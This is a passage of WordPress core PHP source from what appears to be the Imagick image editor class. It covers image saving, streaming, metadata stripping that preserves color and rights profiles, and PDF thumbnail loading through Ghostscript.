WP_Error if error while rotating. */ public function maybe_exif_rotate() { if ( is_callable( array( $this->image, 'setImageOrientation' ) ) && defined( 'Imagick::ORIENTATION_TOPLEFT' ) ) { return parent::maybe_exif_rotate(); } else { return new WP_Error( 'write_exif_error', __( 'The image cannot be rotated because the embedded meta data cannot be updated.' ) ); } } /** * Saves current image to file. * * @since 3.5.0 * @since 6.0.0 The `$filesize` value was added to the returned array. * * @param string $destfilename Optional. Destination filename. Default null. * @param string $mime_type Optional. The mime-type. Default null. * @return array|WP_Error { * Array on success or WP_Error if the file failed to save. * * @type string $path Path to the image file. * @type string $file Name of the image file. * @type int $width Image width. * @type int $height Image height. * @type string $mime-type The mime type of the image. * @type int $filesize File size of the image. * } */ public function save( $destfilename = null, $mime_type = null ) { $saved = $this->_save( $this->image, $destfilename, $mime_type ); if ( ! is_wp_error( $saved ) ) { $this->file = $saved['path']; $this->mime_type = $saved['mime-type']; try { $this->image->setImageFormat( strtoupper( $this->get_extension( $this->mime_type ) ) ); } catch ( Exception $e ) { return new WP_Error( 'image_save_error', $e->getMessage(), $this->file ); } } return $saved; } /** * Removes PDF alpha after it's been read. * * @since 6.4.0 */ protected function remove_pdf_alpha_channel() { $version = Imagick::getVersion(); // Remove alpha channel if possible to avoid black backgrounds for Ghostscript >= 9.14. RemoveAlphaChannel added in ImageMagick 6.7.5. if ( $version['versionNumber'] >= 0x675 ) { try { // Imagick::ALPHACHANNEL_REMOVE mapped to RemoveAlphaChannel in PHP imagick 3.2.0b2. $this->image->setImageAlphaChannel( defined( 'Imagick::ALPHACHANNEL_REMOVE' ) ? Imagick::ALPHACHANNEL_REMOVE : 12 ); } catch ( Exception $e ) { return new WP_Error( 'pdf_alpha_process_failed', $e->getMessage() ); } } } /** * @since 3.5.0 * @since 6.0.0 The `$filesize` value was added to the returned array. * * @param Imagick $image * @param string $filename * @param string $mime_type * @return array|WP_Error { * Array on success or WP_Error if the file failed to save. * * @type string $path Path to the image file. * @type string $file Name of the image file. * @type int $width Image width. * @type int $height Image height. * @type string $mime-type The mime type of the image. * @type int $filesize File size of the image. * } */ protected function _save( $image, $filename = null, $mime_type = null ) { list( $filename, $extension, $mime_type ) = $this->get_output_format( $filename, $mime_type ); if ( ! $filename ) { $filename = $this->generate_filename( null, null, $extension ); } try { // Store initial format. $orig_format = $this->image->getImageFormat(); $this->image->setImageFormat( strtoupper( $this->get_extension( $mime_type ) ) ); } catch ( Exception $e ) { return new WP_Error( 'image_save_error', $e->getMessage(), $filename ); } $write_image_result = $this->write_image( $this->image, $filename ); if ( is_wp_error( $write_image_result ) ) { return $write_image_result; } try { // Reset original format. $this->image->setImageFormat( $orig_format ); } catch ( Exception $e ) { return new WP_Error( 'image_save_error', $e->getMessage(), $filename ); } // Set correct file permissions. $stat = stat( dirname( $filename ) ); $perms = $stat['mode'] & 0000666; // Same permissions as parent folder, strip off the executable bits. chmod( $filename, $perms ); return array( 'path' => $filename, /** This filter is documented in wp-includes/class-wp-image-editor-gd.php */ 'file' => wp_basename( apply_filters( 'image_make_intermediate_size', $filename ) ), 'width' => $this->size['width'], 'height' => $this->size['height'], 'mime-type' => $mime_type, 'filesize' => wp_filesize( $filename ), ); } /** * Writes an image to a file or stream. * * @since 5.6.0 * * @param Imagick $image * @param string $filename The destination filename or stream URL. * @return true|WP_Error */ private function write_image( $image, $filename ) { if ( wp_is_stream( $filename ) ) { /* * Due to reports of issues with streams with `Imagick::writeImageFile()` and `Imagick::writeImage()`, copies the blob instead. * Checks for exact type due to: https://www.php.net/manual/en/function.file-put-contents.php */ if ( file_put_contents( $filename, $image->getImageBlob() ) === false ) { return new WP_Error( 'image_save_error', sprintf( /* translators: %s: PHP function name. */ __( '%s failed while writing image to stream.' ), '<code>file_put_contents()</code>' ), $filename ); } else { return true; } } else { $dirname = dirname( $filename ); if ( ! wp_mkdir_p( $dirname ) ) { return new WP_Error( 'image_save_error', sprintf( /* translators: %s: Directory path. */ __( 'Unable to create directory %s. Is its parent directory writable by the server?' ), esc_html( $dirname ) ) ); } try { return $image->writeImage( $filename ); } catch ( Exception $e ) { return new WP_Error( 'image_save_error', $e->getMessage(), $filename ); } } } /** * Streams current image to browser. * * @since 3.5.0 * * @param string $mime_type The mime type of the image. * @return true|WP_Error True on success, WP_Error object on failure. */ public function stream( $mime_type = null ) { list( $filename, $extension, $mime_type ) = $this->get_output_format( null, $mime_type ); try { // Temporarily change format for stream. $this->image->setImageFormat( strtoupper( $extension ) ); // Output stream of image content. header( "Content-Type: $mime_type" ); print $this->image->getImageBlob(); // Reset image to original format. $this->image->setImageFormat( $this->get_extension( $this->mime_type ) ); } catch ( Exception $e ) { return new WP_Error( 'image_stream_error', $e->getMessage() ); } return true; } /** * Strips all image meta except color profiles from an image. * * @since 4.5.0 * * @return true|WP_Error True if stripping metadata was successful. WP_Error object on error. */ protected function strip_meta() { if ( ! is_callable( array( $this->image, 'getImageProfiles' ) ) ) { return new WP_Error( 'image_strip_meta_error', sprintf( /* translators: %s: ImageMagick method name. */ __( '%s is required to strip image meta.' ), '<code>Imagick::getImageProfiles()</code>' ) ); } if ( ! is_callable( array( $this->image, 'removeImageProfile' ) ) ) { return new WP_Error( 'image_strip_meta_error', sprintf( /* translators: %s: ImageMagick method name. */ __( '%s is required to strip image meta.' ), '<code>Imagick::removeImageProfile()</code>' ) ); } /* * Protect a few profiles from being stripped for the following reasons: * * - icc: Color profile information * - icm: Color profile information * - iptc: Copyright data * - exif: Orientation data * - xmp: Rights usage data */ $protected_profiles = array( 'icc', 'icm', 'iptc', 'exif', 'xmp', ); try { // Strip profiles. foreach ( $this->image->getImageProfiles( '*', true ) as $key => $value ) { if ( ! in_array( $key, $protected_profiles, true ) ) { $this->image->removeImageProfile( $key ); } } } catch ( Exception $e ) { return new WP_Error( 'image_strip_meta_error', $e->getMessage() ); } return true; } /** * Sets up Imagick for PDF processing. * Increases rendering DPI and only loads first page. * * @since 4.7.0 * * @return string|WP_Error File to load or WP_Error on failure. */ protected function pdf_setup() { try { /* * By default, PDFs are rendered in a very low resolution. * We want the thumbnail to be readable, so increase the rendering DPI. */ $this->image->setResolution( 128, 128 ); // Only load the first page. return $this->file . '[0]'; } catch ( Exception $e ) { return new WP_Error( 'pdf_setup_failed', $e->getMessage(), $this->file ); } } /** * Load the image produced by Ghostscript. * * Includes a workaround for a bug in Ghostscript 8.70 that prevents processing of some PDF files * when `use-cropbox` is set. * * @since 5.6.0 * * @return true|WP_Error */ protected function pdf_load_source() { $filename = $this->pdf_setup(); if ( is_wp_error( $filename ) ) { return $filename; } try { /* * When generating thumbnails from cropped PDF pages, Imagemagick uses the uncropped * area (resulting in unnecessary whitespace) unless the following option is set. */ $this->image->setOption( 'pdf:use-cropbox', true ); /* * Reading image after Imagick instantiation because `setResolution` * only applies correctly before the image is read. */ $this->image->readImage( $filename ); } catch ( Exception $e ) { // Attempt to run `gs` without the `use-cropbox` option. See #48853. $this->image->setOption( 'pdf:use-cropbox', false ); $this->image->readImage( $filename ); } return true; } }